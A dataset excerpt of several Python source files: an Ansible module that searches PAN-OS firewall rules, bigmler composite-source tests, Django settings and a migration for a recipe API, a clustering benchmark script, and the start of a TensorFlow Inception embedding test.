- pandevice can be obtained from PyPi U(https://pypi.python.org/pypi/pandevice)
    - xmltodict can be obtained from PyPi U(https://pypi.python.org/pypi/xmltodict)
notes:
- Checkmode is not supported.
- Panorama is supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS firewall or Panorama management console being queried.
required: true
username:
description:
- Username credentials to use for authentication.
required: false
default: "admin"
password:
description:
- Password credentials to use for authentication.
required: true
api_key:
description:
- API key that can be used instead of I(username)/I(password) credentials.
application:
description:
- Name of the application or application group to be queried.
required: false
default: None
source_zone:
description:
- Name of the source security zone to be queried.
required: false
default: None
source_ip:
description:
- The source IP address to be queried.
required: false
default: None
source_port:
description:
- The source port to be queried.
required: false
default: None
destination_zone:
description:
- Name of the destination security zone to be queried.
required: false
default: None
destination_ip:
description:
- The destination IP address to be queried.
required: false
default: None
destination_port:
description:
- The destination port to be queried.
required: false
default: None
protocol:
description:
- The protocol used to be queried. Must be either I(tcp) or I(udp).
required: false
default: None
tag_name:
description:
- Name of the rule tag to be queried.
required: false
default: None
devicegroup:
description:
- The Panorama device group in which to conduct the query.
required: false
default: None
'''
EXAMPLES = '''
- name: search for rules with tcp/3306
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
source_zone: 'DevNet'
destination_zone: 'DevVPC'
destination_port: '3306'
protocol: 'tcp'
- name: search devicegroup for inbound rules to dmz host
panos_query_rules:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
destination_zone: 'DMZ'
destination_ip: '10.100.42.18'
    devicegroup: 'DeviceGroupA'
- name: search for rules containing a specified rule tag
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
tag_name: 'ProjectX'
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
import pan.xapi
from pan.xapi import PanXapiError
import pandevice
from pandevice import base
from pandevice import firewall
from pandevice import panorama
from pandevice import objects
from pandevice import policies
import ipaddress
import xmltodict
import json
HAS_LIB = True
except ImportError:
HAS_LIB = False
def get_devicegroup(device, devicegroup):
    """Return the DeviceGroup named *devicegroup* on *device*, or False if absent."""
    for candidate in device.refresh_devices():
        if isinstance(candidate, pandevice.panorama.DeviceGroup) and candidate.name == devicegroup:
            return candidate
    return False
def get_rulebase(device, devicegroup):
    """Attach and refresh the security rulebase for a Firewall or Panorama device.

    Returns the populated rulebase object, or False for an unsupported
    device type.
    """
    if not isinstance(device, (firewall.Firewall, panorama.Panorama)):
        return False
    if isinstance(device, firewall.Firewall):
        # A firewall holds its rules directly on a local rulebase.
        rulebase = policies.Rulebase()
        device.add(rulebase)
    else:
        # Panorama stores rules as pre-rules under a device group.
        device_group = panorama.DeviceGroup(devicegroup)
        device.add(device_group)
        rulebase = policies.PreRulebase()
        device_group.add(rulebase)
    policies.SecurityRule.refreshall(rulebase)
    return rulebase
def get_object(device, dev_group, obj_name):
    """Find an address object or address group named *obj_name*.

    Shared (global) scope is searched first, objects before groups — the
    same precedence as the original lookup order; the device-group scope
    only applies when *device* is a Panorama. Returns the match or False.
    """
    lookup_order = (objects.AddressObject, objects.AddressGroup)
    for obj_cls in lookup_order:
        found = device.find(obj_name, obj_cls)
        if found:
            return found
    if isinstance(device, pandevice.panorama.Panorama):
        for obj_cls in lookup_order:
            found = dev_group.find(obj_name, obj_cls)
            if found:
                return found
    return False
def addr_in_obj(addr, obj):
    """Return True if IP address *addr* falls within address object *obj*.

    Supports 'ip-netmask' and 'ip-range' address objects; any other object
    or type (e.g. an fqdn object, or an address group) yields False.

    Args:
        addr: IP address string (IPv4 or IPv6).
        obj: pandevice objects.AddressObject to test against.
    """
    ip = ipaddress.ip_address(addr)
    # Process address objects
    if isinstance(obj, objects.AddressObject):
        if obj.type == 'ip-netmask':
            return ip in ipaddress.ip_network(obj.value)
        if obj.type == 'ip-range':
            lower_str, upper_str = obj.value.split('-')
            lower = ipaddress.ip_address(lower_str)
            upper = ipaddress.ip_address(upper_str)
            # PAN-OS ip-range objects include both endpoints, so the
            # comparison must be inclusive (the old `<` excluded them).
            return lower <= ip <= upper
    return False
def get_services(device, dev_group, svc_list, obj_list):
    """Resolve service names into ServiceObjects, expanding groups recursively.

    Matches are appended to *obj_list*; the same list is returned for
    convenience.  On Panorama the device group scope is searched in
    addition to the global scope.
    """
    for name in svc_list:
        svc_obj = device.find(name, objects.ServiceObject)
        if svc_obj:
            obj_list.append(svc_obj)
        svc_grp = device.find(name, objects.ServiceGroup)
        if svc_grp:
            # Service groups hold member names — recurse into them.
            get_services(device, dev_group, svc_grp.value, obj_list)
        if isinstance(device, pandevice.panorama.Panorama):
            dg_obj = dev_group.find(name, objects.ServiceObject)
            if dg_obj:
                obj_list.append(dg_obj)
            dg_grp = dev_group.find(name, objects.ServiceGroup)
            if dg_grp:
                get_services(device, dev_group, dg_grp.value, obj_list)
    return obj_list
def port_in_svc(orientation, port, protocol, obj):
    """Return True when *port*/*protocol* matches service object *obj*.

    orientation: 'source' or 'destination' — selects which port list of
    the service object to inspect.  Port specs are comma-separated
    entries that are either single ports ('80') or inclusive ranges
    ('1024-65535').  *port* is compared as a string for single entries
    and numerically for ranges, matching the original behavior.
    """
    # Bug fix: the original compared strings with 'is', which tests
    # object identity and only worked by accident of CPython string
    # interning; '==' is the correct comparison.
    if orientation == 'source':
        port_spec = obj.source_port
    elif orientation == 'destination':
        port_spec = obj.destination_port
    else:
        return False
    # Protocol must match regardless of which entry hits.
    if obj.protocol != protocol:
        return False
    for entry in port_spec.split(','):
        if '-' in entry:
            bounds = entry.split('-')
            if int(bounds[0]) <= int(port) <= int(bounds[1]):
                return True
        elif port == entry:
            return True
    return False
def get_tag(device, dev_group, tag_name):
    """Find a Tag object by name, searching global scope then the device group."""
    scopes = [device]
    if isinstance(device, panorama.Panorama):
        scopes.append(dev_group)
    for scope in scopes:
        found = scope.find(tag_name, objects.Tag)
        if found:
            return found
    return False
def main():
    """Ansible module entry point: report PAN-OS security rules matching a query.

    Connects to a firewall or Panorama, refreshes address/service/tag
    objects and the security rulebase, evaluates every rule against the
    requested zone/address/port/tag criteria, and exits with the matching
    rules rendered as JSON (or fails when nothing matches).
    """
    argument_spec = dict(
        ip_address=dict(required=True),
        password=dict(no_log=True),
        username=dict(default='admin'),
        api_key=dict(no_log=True),
        application=dict(default=None),
        source_zone=dict(default=None),
        destination_zone=dict(default=None),
        source_ip=dict(default=None),
        destination_ip=dict(default=None),
        source_port=dict(default=None),
        destination_port=dict(default=None),
        protocol=dict(default=None, choices=['tcp', 'udp']),
        tag_name=dict(default=None),
        devicegroup=dict(default=None)
    )
    module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False,
                           required_one_of=[['api_key', 'password']]
                           )
    if not HAS_LIB:
        module.fail_json(msg='Missing required libraries.')
    ip_address = module.params["ip_address"]
    password = module.params["password"]
    username = module.params['username']
    api_key = module.params['api_key']
    # NOTE(review): 'application' is accepted but never used in the matching
    # logic below — presumably reserved for app-based filtering; confirm.
    application = module.params['application']
    source_zone = module.params['source_zone']
    source_ip = module.params['source_ip']
    source_port = module.params['source_port']
    destination_zone = module.params['destination_zone']
    destination_ip = module.params['destination_ip']
    destination_port = module.params['destination_port']
    protocol = module.params['protocol']
    tag_name = module.params['tag_name']
    devicegroup = module.params['devicegroup']
    # Create the device with the appropriate pandevice type
    device = base.PanDevice.create_from_device(ip_address, username, password, api_key=api_key)
    # Grab the global objects
    objects.AddressObject.refreshall(device)
    objects.AddressGroup.refreshall(device)
    objects.ServiceObject.refreshall(device)
    objects.ServiceGroup.refreshall(device)
    objects.Tag.refreshall(device)
    # If Panorama, validate the devicegroup and grab the devicegroup objects
    dev_group = None
    if devicegroup and isinstance(device, panorama.Panorama):
        dev_group = get_devicegroup(device, devicegroup)
        if dev_group:
            device.add(dev_group)
            objects.AddressObject.refreshall(dev_group)
            objects.AddressGroup.refreshall(dev_group)
            objects.ServiceObject.refreshall(dev_group)
            objects.ServiceGroup.refreshall(dev_group)
            objects.Tag.refreshall(dev_group)
        else:
            module.fail_json(
                failed=1,
                msg='\'%s\' device group not found in Panorama. Is the name correct?' % devicegroup
            )
    # Build the rulebase and produce list
    rulebase = get_rulebase(device, dev_group)
    rulelist = rulebase.children
    hitbase = policies.Rulebase()
    # When loose_match is on, a rule field set to 'any' matches every query value.
    loose_match = True
    # Process each rule
    for rule in rulelist:
        # hitlist collects one boolean per requested criterion; the rule is a
        # hit only when no criterion evaluated to False.
        hitlist = []
        if source_zone:
            source_zone_match = False
            if loose_match and 'any' in rule.fromzone:
                source_zone_match = True
            else:
                for object_string in rule.fromzone:
                    if object_string == source_zone:
                        source_zone_match = True
            hitlist.append(source_zone_match)
        if destination_zone:
            destination_zone_match = False
            if loose_match and 'any' in rule.tozone:
                destination_zone_match = True
            else:
                for object_string in rule.tozone:
                    if object_string == destination_zone:
                        destination_zone_match = True
            hitlist.append(destination_zone_match)
        if source_ip:
            source_ip_match = False
            if loose_match and 'any' in rule.source:
                source_ip_match = True
            else:
                for object_string in rule.source:
                    # Get a valid AddressObject or AddressGroup
                    obj = get_object(device, dev_group, object_string)
                    # Otherwise the object_string is not an object and should be handled differently
                    if obj is False:
                        # Literal range ("a-b") or literal address in the rule.
                        if '-' in object_string:
                            obj = ipaddress.ip_address(source_ip)
                            source_range = object_string.split('-')
                            source_lower = ipaddress.ip_address(source_range[0])
                            source_upper = ipaddress.ip_address(source_range[1])
                            if source_lower <= obj <= source_upper:
                                source_ip_match = True
                        else:
                            if source_ip == object_string:
                                source_ip_match = True
                    if isinstance(obj, objects.AddressObject) and addr_in_obj(source_ip, obj):
                        source_ip_match = True
                    elif isinstance(obj, objects.AddressGroup) and obj.static_value:
                        # Static groups: test each member object individually.
                        for member_string in obj.static_value:
                            member = get_object(device, dev_group, member_string)
                            if addr_in_obj(source_ip, member):
                                source_ip_match = True
            hitlist.append(source_ip_match)
        if destination_ip:
            destination_ip_match = False
            if loose_match and 'any' in rule.destination:
                destination_ip_match = True
            else:
                for object_string in rule.destination:
                    # Get a valid AddressObject or AddressGroup
                    obj = get_object(device, dev_group, object_string)
                    # Otherwise the object_string is not an object and should be handled differently
                    if obj is False:
                        if '-' in object_string:
                            obj = ipaddress.ip_address(destination_ip)
                            destination_range = object_string.split('-')
                            destination_lower = ipaddress.ip_address(destination_range[0])
                            destination_upper = ipaddress.ip_address(destination_range[1])
                            if destination_lower <= obj <= destination_upper:
                                destination_ip_match = True
                        else:
                            if destination_ip == object_string:
                                destination_ip_match = True
                    if isinstance(obj, objects.AddressObject) and addr_in_obj(destination_ip, obj):
                        destination_ip_match = True
                    elif isinstance(obj, objects.AddressGroup) and obj.static_value:
                        for member_string in obj.static_value:
                            member = get_object(device, dev_group, member_string)
                            if addr_in_obj(destination_ip, member):
                                destination_ip_match = True
            hitlist.append(destination_ip_match)
        if source_port:
            source_port_match = False
            orientation = 'source'
            if loose_match and (rule.service[0] == 'any'):
                source_port_match = True
            elif rule.service[0] == 'application-default':
                source_port_match = False # Fix this once apps are supported
            else:
                service_list = []
                service_list = get_services(device, dev_group, rule.service, service_list)
                for obj in service_list:
                    if port_in_svc(orientation, source_port, protocol, obj):
                        source_port_match = True
                        break
            hitlist.append(source_port_match)
        if destination_port:
            destination_port_match = False
            orientation = 'destination'
            if loose_match and (rule.service[0] == 'any'):
                destination_port_match = True
            elif rule.service[0] == 'application-default':
                destination_port_match = False # Fix this once apps are supported
            else:
                service_list = []
                service_list = get_services(device, dev_group, rule.service, service_list)
                for obj in service_list:
                    if port_in_svc(orientation, destination_port, protocol, obj):
                        destination_port_match = True
                        break
            hitlist.append(destination_port_match)
        if tag_name:
            tag_match = False
            if rule.tag:
                for object_string in rule.tag:
                    obj = get_tag(device, dev_group, object_string)
                    if obj and (obj.name == tag_name):
                        tag_match = True
            hitlist.append(tag_match)
        # Add to hit rulebase
        if False not in hitlist:
            hitbase.add(rule)
    # Dump the hit rulebase
    if hitbase.children:
        output_string = xmltodict.parse(hitbase.element_str())
        module.exit_json(
            stdout_lines=json.dumps(output_string, indent=2),
            msg='%s of %s rules matched' % (hitbase.children.__len__(), rulebase.children.__len__())
        )
    else:
        module.fail_json(msg='No matching rules found.')
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
| 36.970356 | 116 | 0.603304 |
acdfbbca6a39e4d9d94dfe8ef9a653618bc754f6 | 9,872 | py | Python | bigmler/tests/test_42_composites.py | jaor/bigmler | cd06940a3eac1f49ce9df36864dfd1882782be7e | [
"Apache-2.0"
] | null | null | null | bigmler/tests/test_42_composites.py | jaor/bigmler | cd06940a3eac1f49ce9df36864dfd1882782be7e | [
"Apache-2.0"
] | null | null | null | bigmler/tests/test_42_composites.py | jaor/bigmler | cd06940a3eac1f49ce9df36864dfd1882782be7e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2021 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Testing fusion predictions creation
"""
import os
from bigmler.tests.world import (world, common_setup_module,
common_teardown_module,
teardown_class)
import bigmler.tests.composite_steps as composite_create
import bigmler.tests.basic_tst_prediction_steps as source_create
def setup_module():
    """Module-level fixture: delegate to the shared BigMLer test setup."""
    common_setup_module()
def teardown_module():
    """Module-level fixture: delegate to the shared BigMLer test teardown."""
    common_teardown_module()
class TestComposite(object):
    """Integration scenarios for BigML composite sources.

    Covers creating composites from existing sources, adding/removing/
    deleting component sources, and building image composites from zips,
    directories, and annotated (JSON/VOC/YOLO) image sets.  Scenarios call
    the live BigML API through the shared step helpers and the global
    ``world`` test state.
    """
    def setup(self):
        """
        Debug information
        """
        print("\n-------------------\nTests in: %s\n" % __name__)
    def teardown(self):
        """Calling generic teardown for every method
        """
        # Resets the shared ``world`` resources between test methods.
        self.world = teardown_class()
        print("\nEnd of tests in: %s\n-------------------\n" % __name__)
    def test_scenario01(self):
        """
        Scenario: Successfully building a composite
            And I create a source from "<data>"
            And I check that the source is ready
            And I create an composite with the source
            And I check that the composite is ready
            And I check that the source is a composite component
            And I remove the source from the composite
            And I check that the composite is empty
        """
        print(self.test_scenario01.__doc__)
        examples = [
            ['data/iris.csv', './scenario41_01']]
        for example in examples:
            print("\nTesting with:\n", example)
            source_create.i_create_source( \
                self, data=example[0], output_dir=example[1])
            source_create.i_check_create_source(self)
            self.sources = [world.source["resource"]]
            composite_create.i_create_composite_from_sources( \
                self, sources=",".join(self.sources), output_dir=example[1])
            composite_create.i_check_create_composite(self)
            composite_create.check_sources_in_composite(self)
            # Removing (not deleting) must leave the standalone source alive.
            composite_create.remove_sources(self, output_dir=example[1])
            composite_create.i_check_create_composite(self)
            self.source = self.sources[0]
            self.sources = []
            composite_create.check_sources_in_composite(self)
            source_create.check_source_exists(self, exists=True)
    def test_scenario02(self):
        """
        Scenario: Successfully building a composite and adding sources
            And I create a source from "<data>"
            And I check that the source is ready
            And I create an empty composite and add the source
            And I check that the composite is ready
            And I check that the source is a composite component
        """
        print(self.test_scenario02.__doc__)
        examples = [
            ['data/iris.csv', './scenario41_02']]
        for example in examples:
            print("\nTesting with:\n", example)
            source_create.i_create_source( \
                self, data=example[0], output_dir=example[1])
            source_create.i_check_create_source(self)
            self.sources = [world.source["resource"]]
            composite_create.i_create_empty_composite_and_add_source( \
                self, add_sources=",".join(self.sources),
                output_dir=example[1])
            composite_create.i_check_create_composite(self)
            composite_create.check_sources_in_composite(self)
    def test_scenario03(self):
        """
        Scenario: Successfully building a composite
            And I create a source from "<data>"
            And I check that the source is ready
            And I create an composite with the source
            And I check that the composite is ready
            And I check that the source is a composite component
            And I remove the source from the composite
            And I check that the composite is empty
        """
        print(self.test_scenario03.__doc__)
        examples = [
            ['data/iris.csv', './scenario41_03']]
        for example in examples:
            print("\nTesting with:\n", example)
            source_create.i_create_source( \
                self, data=example[0], output_dir=example[1])
            source_create.i_check_create_source(self)
            self.sources = [world.source["resource"]]
            composite_create.i_create_composite_from_sources( \
                self, sources=",".join(self.sources), output_dir=example[1])
            composite_create.i_check_create_composite(self)
            composite_create.check_sources_in_composite(self)
            # Deleting (unlike scenario01's remove) destroys the source too.
            composite_create.delete_sources(self, output_dir=example[1])
            composite_create.i_check_create_composite(self)
            self.source = self.sources[0]
            self.sources = []
            composite_create.check_sources_in_composite(self)
            source_create.check_source_exists(self, exists=False)
    def test_scenario04(self):
        """
        Scenario: Successfully building an images composite
            And I create a source from a "<zip>" of "<images_number>" images
            And I check that the composite is ready
            And I check that it has "<images_number>" components
        """
        print(self.test_scenario04.__doc__)
        examples = [
            ['data/images/fruits_hist.zip', './scenario41_04']]
        for example in examples:
            print("\nTesting with:\n", example)
            source_create.i_create_source( \
                self, data=example[0], output_dir=example[1])
            composite_create.i_check_create_composite(self)
            self.sources = world.source["object"].get("sources", [])
            composite_create.check_images_number_in_composite(self,
                                                              example[0])
    def test_scenario05(self):
        """
        Scenario: Successfully building an images composite from directory
            And I create a source from a "<directory>" of "<images_number>" images
            And I check that the composite is ready
            And I check that it has "<images_number>" components
        """
        print(self.test_scenario05.__doc__)
        examples = [
            ['data/images/fruits_hist/', './scenario41_05']]
        for example in examples:
            print("\nTesting with:\n", example)
            source_create.i_create_source( \
                self, data=example[0], output_dir=example[1])
            composite_create.i_check_create_composite(self)
            self.sources = world.source["object"].get("sources", [])
            composite_create.check_images_number_in_composite(self,
                                                              example[0])
    def test_scenario06(self):
        """
        Scenario: Successfully building an annotated images composite
            And I create a source from an "<annotations_file>" and an "<images_file>"
            And I check that the composite is ready
            And I check that it has "<annotation_fields>"
        """
        print(self.test_scenario06.__doc__)
        examples = [
            ['data/images/fruits_hist.zip', 'data/images/annotations.json',
             './scenario41_06']]
        for example in examples:
            print("\nTesting with:\n", example)
            composite_create.i_create_annotated_source( \
                self, images_file=example[0], annotations_file=example[1],
                output_dir=example[2])
            composite_create.i_check_create_composite(self)
            self.sources = world.source["object"].get("sources", [])
            composite_create.check_images_number_in_composite(self,
                                                              example[0])
            composite_create.check_annotation_fields(self, example[1])
    def test_scenario07(self):
        """
        Scenario: Successfully building a <annotations_language> annotated images composite
            And I create a source from an "<annotations_dir>" and an "<images_dir>"
            And I check that the composite is ready
            And I check that it has "<annotation_fields>"
        """
        print(self.test_scenario07.__doc__)
        examples = [
            ['data/images/fruits_hist', 'data/images/VOC_annotations',
             './scenario41_07', 'VOC'],
            ['data/images/YOLO_annotations', 'data/images/YOLO_annotations',
             './scenario41_07', 'YOLO']]
        for example in examples:
            print("\nTesting with:\n", example)
            composite_create.i_create_lang_annotated_source( \
                self, images_dir=example[0], annotations_dir=example[1],
                annotations_language=example[3],
                output_dir=example[2])
            composite_create.i_check_create_composite(self)
            self.sources = world.source["object"].get("sources", [])
            composite_create.check_images_number_in_composite(self,
                                                              example[0])
            composite_create.check_annotation_fields(
                self,
                os.path.join(example[2], "annotations.json"))
| 40.130081 | 91 | 0.606767 |
acdfbbd9dd87deb877c17d1e536ac90dd8bc5b1b | 3,412 | py | Python | app/app/settings.py | jaramosperez/recipe-app-api | 865b4d50bede8544aa77f2f09c4429922ec0bfd2 | [
"MIT"
] | 1 | 2020-09-10T03:03:22.000Z | 2020-09-10T03:03:22.000Z | app/app/settings.py | jaramosperez/recipe-app-api | 865b4d50bede8544aa77f2f09c4429922ec0bfd2 | [
"MIT"
] | null | null | null | app/app/settings.py | jaramosperez/recipe-app-api | 865b4d50bede8544aa77f2f09c4429922ec0bfd2 | [
"MIT"
] | null | null | null | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c)hha!zoz9))wu75@^8vnmjghl0ij8kot2jt-0pz2!oc)bri_4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
'recipe',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = '/vol/web/media'
STATIC_ROOT = '/vol/web/static'
AUTH_USER_MODEL = 'core.User' | 25.462687 | 91 | 0.686987 |
acdfbc8febb6b66272c1a876c6255b1290f3f4c6 | 974 | py | Python | src/models/tests/test_prequential.py | cseveriano/evolving_clustering | 50dd2b4e38ee11aba9382f1a8e04f530b7c9c949 | [
"MIT"
] | 5 | 2018-11-16T21:04:11.000Z | 2020-12-04T22:09:23.000Z | src/models/tests/test_prequential.py | cseveriano/evolving_clustering | 50dd2b4e38ee11aba9382f1a8e04f530b7c9c949 | [
"MIT"
] | null | null | null | src/models/tests/test_prequential.py | cseveriano/evolving_clustering | 50dd2b4e38ee11aba9382f1a8e04f530b7c9c949 | [
"MIT"
] | 1 | 2020-12-09T02:25:49.000Z | 2020-12-09T02:25:49.000Z | from sklearn import preprocessing
from evolving import EvolvingClustering, util
from evolving.util import Metrics, Benchmarks, load_dataset
import matplotlib.pyplot as plt
import numpy as np
X, y = load_dataset.load_dataset("gaussian")
standardized_X = preprocessing.scale(X)
minmaxscaler = preprocessing.MinMaxScaler()
minmaxscaler.fit(standardized_X)
X = minmaxscaler.transform(standardized_X)
#y = np.array([el[0] for el in y])
evol_model = EvolvingClustering.EvolvingClustering(variance_limit=0.001, decay=1000, debug=True)
nsamples = 6000
train_size = 1000
window_size = 1000
X = X[:nsamples,:2]
y = y[:nsamples]
result = Benchmarks.prequential_evaluation(evol_model, X, y, Metrics.precision, train_size, window_size, elapsed_time=True)
util.plot_macro_clusters(X, evol_model)
fig = plt.figure(figsize=(14,6))
windows = np.arange(train_size+window_size,nsamples+window_size,window_size)
plt.plot(windows,result['error_list'],'o-', color='blue',label='Evolving') | 32.466667 | 123 | 0.793634 |
acdfbc9267e725f760a09d0ce5324552c86472b2 | 1,935 | py | Python | taxinnovation/apps/catalogs/migrations/0002_auto_20200807_1714.py | rootUserM/Docekerfiles-examples | b2b2e6b8cd37f699bd182a358d472deff5eb1921 | [
"CC-BY-3.0"
] | null | null | null | taxinnovation/apps/catalogs/migrations/0002_auto_20200807_1714.py | rootUserM/Docekerfiles-examples | b2b2e6b8cd37f699bd182a358d472deff5eb1921 | [
"CC-BY-3.0"
] | null | null | null | taxinnovation/apps/catalogs/migrations/0002_auto_20200807_1714.py | rootUserM/Docekerfiles-examples | b2b2e6b8cd37f699bd182a358d472deff5eb1921 | [
"CC-BY-3.0"
] | null | null | null | # Generated by Django 3.0.8 on 2020-08-07 22:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated migration: adds audit fields to PostalCodeCatalog.

    Introduces created_at/created_by, modified_at/modified_by and an
    is_active soft-delete flag.  Auto-generated by ``makemigrations`` —
    do not hand-edit the operations.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('catalogs', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='postalcodecatalog',
            name='created_at',
            # preserve_default=False: timezone.now was only supplied to
            # backfill existing rows during this migration.
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, help_text='Fecha en que el registro fue creado.', verbose_name='Fecha de creación'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='postalcodecatalog',
            name='created_by',
            # default=1: existing rows are attributed to the user with pk 1.
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='catalogs_postalcodecatalog_created', to=settings.AUTH_USER_MODEL, verbose_name='Usuario creador'),
        ),
        migrations.AddField(
            model_name='postalcodecatalog',
            name='is_active',
            # NOTE(review): help_text here is a tuple, not a string — looks
            # unintentional in the model, but is preserved as generated.
            field=models.BooleanField(default=True, help_text=('Indica si el registro debe ser tratado como activo.', 'Desmarque esta opción en lugar de borrar el registro'), verbose_name='active'),
        ),
        migrations.AddField(
            model_name='postalcodecatalog',
            name='modified_at',
            field=models.DateTimeField(auto_now=True, help_text='Última fecha en que el registro fue modificado', verbose_name='Ultima modificación'),
        ),
        migrations.AddField(
            model_name='postalcodecatalog',
            name='modified_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='catalogs_postalcodecatalog_modified', to=settings.AUTH_USER_MODEL, verbose_name='Usuario editor'),
        ),
    ]
| 43.977273 | 204 | 0.68062 |
acdfbdbdd5218772f90a82012b9d3326207eada6 | 5,923 | py | Python | research/im2txt/im2txt/ops/image_embedding_test.py | Dzinushi/models_1_4 | d7e72793a68c1667d403b1542c205d1cd9b1d17c | [
"Apache-2.0"
] | null | null | null | research/im2txt/im2txt/ops/image_embedding_test.py | Dzinushi/models_1_4 | d7e72793a68c1667d403b1542c205d1cd9b1d17c | [
"Apache-2.0"
] | null | null | null | research/im2txt/im2txt/ops/image_embedding_test.py | Dzinushi/models_1_4 | d7e72793a68c1667d403b1542c205d1cd9b1d17c | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow_models.im2txt.ops.image_embedding."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from im2txt.ops import image_embedding
class InceptionV3Test(tf.test.TestCase):
  """Tests for the im2txt inception_v3 image-embedding graph builder.

  Each test builds the graph with one (trainable, is_training) combination
  and checks the embedding shape, per-scope parameter counts, and the sizes
  of the TensorFlow graph collections that the combination should populate.
  """
  def setUp(self):
    super(InceptionV3Test, self).setUp()
    # Standard Inception v3 input: 299x299 RGB images.
    batch_size = 4
    height = 299
    width = 299
    num_channels = 3
    self._images = tf.placeholder(tf.float32,
                                  [batch_size, height, width, num_channels])
    self._batch_size = batch_size
  def _countInceptionParameters(self):
    """Counts the number of parameters in the inception model at top scope."""
    counter = {}
    for v in tf.global_variables():
      name_tokens = v.op.name.split("/")
      if name_tokens[0] == "InceptionV3":
        # Aggregate by second-level scope, e.g. "InceptionV3/Mixed_5b".
        name = "InceptionV3/" + name_tokens[1]
        num_params = v.get_shape().num_elements()
        assert num_params
        counter[name] = counter.get(name, 0) + num_params
    return counter
  def _verifyParameterCounts(self):
    """Verifies the number of parameters in the inception model."""
    param_counts = self._countInceptionParameters()
    # Known per-scope parameter totals for the stock Inception v3 tower.
    expected_param_counts = {
        "InceptionV3/Conv2d_1a_3x3": 960,
        "InceptionV3/Conv2d_2a_3x3": 9312,
        "InceptionV3/Conv2d_2b_3x3": 18624,
        "InceptionV3/Conv2d_3b_1x1": 5360,
        "InceptionV3/Conv2d_4a_3x3": 138816,
        "InceptionV3/Mixed_5b": 256368,
        "InceptionV3/Mixed_5c": 277968,
        "InceptionV3/Mixed_5d": 285648,
